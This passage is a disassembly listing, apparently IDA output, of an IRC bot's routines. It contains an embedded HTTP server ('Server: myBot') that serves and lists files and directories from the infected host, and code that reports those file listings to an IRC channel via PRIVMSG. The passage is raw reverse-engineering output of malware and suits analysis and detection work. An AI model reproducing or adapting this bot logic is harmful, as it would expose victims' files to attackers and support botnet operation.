jz loc_40FF74
xor esi, esi
mov [ebp+var_4], esi
loc_40FC95: ; CODE XREF: sub_40FB88+3E1�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_4E410C ; __WSAFDIsSet
test eax, eax
jz loc_40FF5F
cmp esi, [ebp+var_C]
jnz short loc_40FD17
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_4E42B4 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FF5F
xor ecx, ecx
test ebx, ebx
jbe short loc_40FCE9
lea edx, [ebp+var_134]
loc_40FCDD: ; CODE XREF: sub_40FB88+15F�j
cmp [edx], eax
jz short loc_40FCE9
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_40FCDD
loc_40FCE9: ; CODE XREF: sub_40FB88+14D�j
; sub_40FB88+157�j
cmp ecx, ebx
jnz short loc_40FD06
cmp ebx, 40h
jnb short loc_40FD06
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_40FD06: ; CODE XREF: sub_40FB88+163�j
; sub_40FB88+168�j
cmp eax, [ebp+var_8]
jbe loc_40FF5F
mov [ebp+var_8], eax
jmp loc_40FF5F
; ---------------------------------------------------------------------------
loc_40FD17: ; CODE XREF: sub_40FB88+126�j
mov edi, 1000h
lea eax, [ebp+Str]
push edi ; Size
push 0 ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+Str]
push 0
push edi
push eax
push esi
call dword_4E4238 ; recv
test eax, eax
jg short loc_40FDAA
push esi
call dword_4E42B8 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_40FF5F
lea eax, [ebp+var_134]
loc_40FD69: ; CODE XREF: sub_40FB88+1EB�j
cmp [eax], esi
jz short loc_40FD7A
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FD69
jmp loc_40FF5F
; ---------------------------------------------------------------------------
loc_40FD7A: ; CODE XREF: sub_40FB88+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FD9E
lea eax, [ebp+ecx*4+var_134]
loc_40FD88: ; CODE XREF: sub_40FB88+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FD88
loc_40FD9E: ; CODE XREF: sub_40FB88+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_40FF5F
; ---------------------------------------------------------------------------
loc_40FDAA: ; CODE XREF: sub_40FB88+1C8�j
xor esi, esi
push 104h ; Size
lea eax, [ebp+var_23C]
push esi ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Str]
mov [ebp+arg_0], esi
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jbe loc_40FF5F
loc_40FDD8: ; CODE XREF: sub_40FB88+30F�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+Str]
cmp al, 0Ah
mov [ebp+esi+Str1], al
jnz loc_40FE83
lea eax, [ebp+Str1]
push offset aGet_0 ; "GET "
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FE57
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 5
pop ecx
jbe short loc_40FE57
push offset asc_44B7D0 ; " "
push offset asc_44B7D4 ; " "
lea eax, [ebp+Str1]
push offset aGet_1 ; "GET "
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strtok
push eax ; Source
lea eax, [ebp+var_23C]
push eax ; Dest
call _strcpy
add esp, 10h
jmp short loc_40FE6E
; ---------------------------------------------------------------------------
loc_40FE57: ; CODE XREF: sub_40FB88+27E�j
; sub_40FB88+290�j
lea eax, [ebp+Str1]
push offset asc_44B7E0 ; "\r\n"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40FEA2
loc_40FE6E: ; CODE XREF: sub_40FB88+2CD�j
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40FE83: ; CODE XREF: sub_40FB88+263�j
inc [ebp+arg_0]
lea eax, [ebp+Str]
push eax ; Str
inc esi
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jb loc_40FDD8
jmp loc_40FF5F
; ---------------------------------------------------------------------------
loc_40FEA2: ; CODE XREF: sub_40FB88+2E4�j
xor ecx, ecx
test ebx, ebx
jbe short loc_40FEEC
lea eax, [ebp+var_134]
loc_40FEAE: ; CODE XREF: sub_40FB88+333�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_40FEBF
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_40FEAE
jmp short loc_40FEEF
; ---------------------------------------------------------------------------
loc_40FEBF: ; CODE XREF: sub_40FB88+32B�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_40FEE3
lea eax, [ebp+ecx*4+var_134]
loc_40FECD: ; CODE XREF: sub_40FB88+359�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_40FECD
loc_40FEE3: ; CODE XREF: sub_40FB88+33C�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_40FEEF
; ---------------------------------------------------------------------------
loc_40FEEC: ; CODE XREF: sub_40FB88+31E�j
mov esi, [ebp+var_4]
loc_40FEEF: ; CODE XREF: sub_40FB88+335�j
; sub_40FB88+362�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_40FF58
lea eax, [ebp+var_360]
push eax ; Str
call _strlen
mov edi, eax
lea eax, [ebp+var_23C]
push eax ; Str
call _strlen
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_40FF58
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_4E42BC ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_41016C
add esp, 14h
jmp short loc_40FF5F
; ---------------------------------------------------------------------------
loc_40FF58: ; CODE XREF: sub_40FB88+36F�j
; sub_40FB88+395�j
push esi
call dword_4E42B8 ; closesocket
loc_40FF5F: ; CODE XREF: sub_40FB88+11D�j
; sub_40FB88+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40FC95
jmp loc_40FC5F
; ---------------------------------------------------------------------------
loc_40FF74: ; CODE XREF: sub_40FB88+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_40FF79: ; CODE XREF: sub_40FB88+6A�j
; sub_40FB88+92�j ...
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44B7E4 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40FFBF
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_250] ; int
push eax ; int
lea eax, [ebp+var_5E8]
push eax ; Str
push [ebp+var_5EC] ; int
call sub_409D6C
add esp, 14h
loc_40FFBF: ; CODE XREF: sub_40FB88+412�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_254]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
pop ebx
sub_40FB88 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFE9 proc near ; DATA XREF: sub_41016C+24D�o
Str = byte ptr -1654h
Source = byte ptr -654h
Dest = byte ptr -550h
var_44C = dword ptr -44Ch
Format = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_41004F
push offset aTextHtml ; "text/html"
jmp short loc_410054
; ---------------------------------------------------------------------------
loc_41004F: ; CODE XREF: sub_40FFE9+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_410054: ; CODE XREF: sub_40FFE9+64�j
lea eax, [ebp+var_9C]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_4F640C ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_4F6408 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_4100CD
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 24h
jmp short loc_4100EE
; ---------------------------------------------------------------------------
loc_4100CD: ; CODE XREF: sub_40FFE9+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 28h
loc_4100EE: ; CODE XREF: sub_40FFE9+E2�j
lea eax, [ebp+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_44C]
call dword_4E4270 ; send
cmp [ebp+var_A4], edi
jnz short loc_41012E
lea eax, [ebp+Dest]
push eax
push [ebp+var_44C]
call sub_410AA9
pop ecx
pop ecx
jmp short loc_41014B
; ---------------------------------------------------------------------------
loc_41012E: ; CODE XREF: sub_40FFE9+12D�j
lea eax, [ebp+Source]
push eax ; Source
push edi ; int
push [ebp+var_44C] ; int
lea eax, [ebp+Dest]
push eax ; Str
call sub_410423
add esp, 10h
loc_41014B: ; CODE XREF: sub_40FFE9+143�j
push [ebp+var_44C]
call dword_4E42B8 ; closesocket
push [ebp+var_B4]
call sub_40BAAA
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_40FFE9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41016C proc near ; CODE XREF: sub_40FB88+3C6�p
Source = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
Str = byte ptr -314h
var_211 = byte ptr -211h
Dst = byte ptr -210h
Dest = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_4101A2
push eax
push offset aS_25 ; "\\%s"
jmp short loc_4101AB
; ---------------------------------------------------------------------------
loc_4101A2: ; CODE XREF: sub_41016C+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_26 ; "%s"
loc_4101AB: ; CODE XREF: sub_41016C+34�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
xor esi, esi
xor ebx, ebx
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_410246
mov [ebp+arg_8], 2
loc_4101D6: ; CODE XREF: sub_41016C+D8�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_410216
cmp [ebp+esi+Dest], 25h
jnz short loc_410216
cmp [ebp+esi+var_10B], 32h
jnz short loc_410216
cmp [ebp+esi+var_10A], 30h
jnz short loc_410216
inc esi
mov [ebp+ebx+Dst], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_410230
; ---------------------------------------------------------------------------
loc_410216: ; CODE XREF: sub_41016C+7A�j
; sub_41016C+84�j ...
mov al, [ebp+esi+Dest]
cmp al, 2Fh
jnz short loc_410226
push 5Ch
pop eax
jmp short loc_410229
; ---------------------------------------------------------------------------
loc_410226: ; CODE XREF: sub_41016C+B3�j
movsx eax, al
loc_410229: ; CODE XREF: sub_41016C+B8�j
mov [ebp+ebx+Dst], al
loc_410230: ; CODE XREF: sub_41016C+A8�j
lea eax, [ebp+Dest]
inc esi
inc [ebp+arg_8]
push eax ; Str
inc ebx
call _strlen
cmp esi, eax
pop ecx
jb short loc_4101D6
loc_410246: ; CODE XREF: sub_41016C+61�j
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Str]
push [ebp+arg_4]
push offset aSS_4 ; "%s%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push offset asc_44BA30 ; "\n"
push eax ; Str
call _strtok
add esp, 18h
lea eax, [ebp+Str]
push eax
call ds:dword_4F63A0 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_410297
cmp eax, 0FFFFFFFFh
jnz short loc_41029A
push [ebp+arg_0]
jmp loc_41031A
; ---------------------------------------------------------------------------
loc_410297: ; CODE XREF: sub_41016C+11C�j
mov [ebp+var_4], esi
loc_41029A: ; CODE XREF: sub_41016C+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_4102A7
mov [ebp+var_4], esi
loc_4102A7: ; CODE XREF: sub_41016C+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_410325
cmp [ebp+arg_C], edi
jz short loc_410319
lea eax, [ebp+Str]
push offset asc_44BA34 ; "*"
push eax ; Dest
call _strcat
pop ecx
lea eax, [ebp+Str]
pop ecx
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Str
call sub_410B66
add esp, 0Ch
lea eax, [ebp+Dst]
push eax ; Format
lea eax, [ebp+var_53C]
push eax ; Dest
call _sprintf
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_410374
; ---------------------------------------------------------------------------
loc_410319: ; CODE XREF: sub_41016C+152�j
push ebx
loc_41031A: ; CODE XREF: sub_41016C+126�j
call dword_4E42B8 ; closesocket
jmp loc_41041C
; ---------------------------------------------------------------------------
loc_410325: ; CODE XREF: sub_41016C+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_410374
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:dword_4F6410 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_4F6370 ; CloseHandle
loc_410374: ; CODE XREF: sub_41016C+1AB�j
; sub_41016C+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+Source]
push esi
push offset asc_44BA38 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B78E
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_45712C[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40FFE9
push edi
push edi
call ds:dword_4F6384 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_45713C[ecx], eax
jz short loc_4103EE
loc_4103DC: ; CODE XREF: sub_41016C+280�j
cmp [ebp+var_318], edi
jnz short loc_41041C
push 5
call ds:dword_4F6380 ; Sleep
jmp short loc_4103DC
; ---------------------------------------------------------------------------
loc_4103EE: ; CODE XREF: sub_41016C+26E�j
push ebx
call dword_4E42B8 ; closesocket
call ds:dword_4F6394 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44BA6C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C77
add esp, 10h
loc_41041C: ; CODE XREF: sub_41016C+1B4�j
; sub_41016C+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_41016C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410423(char *Str,int,int,char *Source)
sub_410423 proc near ; CODE XREF: sub_401CC7+78CD�p
; sub_40FFE9+15A�p
Dst = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
Str1 = byte ptr -35Ch
var_248 = byte ptr -248h
Dest = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call _memset
mov edi, [ebp+Str]
push offset asc_44BAA4 ; "\n"
push edi ; Str
call _strtok
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_410482
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_410581
; ---------------------------------------------------------------------------
loc_410482: ; CODE XREF: sub_410423+3A�j
cmp [ebp+Source], ebx
push edi ; Str
jz loc_410567
call _strlen
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
push edi ; Str
call _strlen
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_410581
; ---------------------------------------------------------------------------
loc_410567: ; CODE XREF: sub_410423+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_410581: ; CODE XREF: sub_410423+5A�j
; sub_410423+142�j
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
cmp [ebp+Source], ebx
jz short loc_41061C
push [ebp+Source] ; Str
call _strlen
cmp eax, 2
pop ecx
jbe short loc_41061C
push [ebp+Source] ; Str
call _strlen
sub eax, 3
pop ecx
jz short loc_4105CD
loc_4105C1: ; CODE XREF: sub_410423+1A8�j
mov ecx, [ebp+Source]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4105CD
dec eax
jnz short loc_4105C1
loc_4105CD: ; CODE XREF: sub_410423+19C�j
; sub_410423+1A5�j
inc eax
push eax ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
loc_41061C: ; CODE XREF: sub_410423+180�j
; sub_410423+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_4F6424 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+Str], eax
push ecx
push eax
call ds:dword_4F6420 ; FindNextFileA
test eax, eax
jz loc_410A0C
mov edi, 1FFh
loc_410648: ; CODE XREF: sub_410423+5E3�j
cmp [ebp+var_388], ebx
jz loc_4109F4
lea eax, [ebp+Str1]
push offset a__ ; ".."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4109F4
lea eax, [ebp+Str1]
push offset a__2 ; "."
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz loc_4109F4
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_4F641C ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_4F6418 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm_0 ; "PM"
cmp ax, 0Ch
ja short loc_4106BD
mov ecx, offset aAm ; "AM"
loc_4106BD: ; CODE XREF: sub_410423+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_4106C9
sub eax, 0Ch
loc_4106C9: ; CODE XREF: sub_410423+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+Dest]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax ; Dest
call _sprintf
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_41086C
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_41073D
lea eax, [ebp+Str1]
push eax
push offset aS_27 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_4109B5
; ---------------------------------------------------------------------------
loc_41073D: ; CODE XREF: sub_410423+2E0�j
cmp [ebp+Source], ebx
jz loc_410827
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_5 ; "%s%s/"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Eh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_4107DD
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4107E2
; ---------------------------------------------------------------------------
loc_4107DD: ; CODE XREF: sub_410423+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4107E2: ; CODE XREF: sub_410423+3B8�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4109B6
; ---------------------------------------------------------------------------
loc_410827: ; CODE XREF: sub_410423+31D�j
lea eax, [ebp+Str1]
push eax
push offset aS_28 ; "<%s>"
lea eax, [ebp+var_490]
push 106h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_4109C5
; ---------------------------------------------------------------------------
loc_41086C: ; CODE XREF: sub_410423+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4108AB
push ebx
push [ebp+var_368]
call sub_4174C3
pop ecx
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi ; Count
loc_410897: ; CODE XREF: sub_410423+577�j
lea eax, [ebp+var_248]
push eax ; Dest
call __snprintf
add esp, 1Ch
jmp loc_4109C5
; ---------------------------------------------------------------------------
loc_4108AB: ; CODE XREF: sub_410423+44F�j
cmp [ebp+Source], ebx
jz loc_41099F
push 0E6h
push offset aTrTdWidthDAH_0 ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+var_248]
push [ebp+Source]
push offset aSS_6 ; "%s%s"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Fh
pop ecx
lea eax, [ebp+Str1]
push eax
jbe short loc_41094B
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_410950
; ---------------------------------------------------------------------------
loc_41094B: ; CODE XREF: sub_410423+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_410950: ; CODE XREF: sub_410423+526�j
lea eax, [ebp+var_248]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_4E4270 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+Dest]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_410897
; ---------------------------------------------------------------------------
loc_41099F: ; CODE XREF: sub_410423+48B�j
push [ebp+var_368]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_4109B5: ; CODE XREF: sub_410423+315�j
push esi ; Count
loc_4109B6: ; CODE XREF: sub_410423+3FF�j
